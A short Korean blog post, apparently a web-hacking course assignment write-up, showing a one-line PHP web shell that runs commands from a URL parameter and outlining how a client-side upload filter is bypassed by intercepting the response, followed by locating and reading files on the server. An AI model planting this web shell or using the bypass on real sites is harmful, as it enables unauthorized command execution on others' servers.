웹 해킹 코스/과제
14차 문제풀이 Web Shell 2
팥들었슈_
2024. 2. 13. 13:43
1. 웹 셸 코드 작성
<?php
echo system($_GET['cmd']);
?>
2. 파일 업로드
2-2. 분석
http response 분석 결과 확장자 구분의 내용이 front 의 스크립트에서 필터링 되는 것을 확인
response를 intercept하여 script를 제거
2-3 파일 재업로드
그런데??? index가 풀려있다?
3. 파일 경로찾기
4. find 파일 찾기
5. 파일 조회하기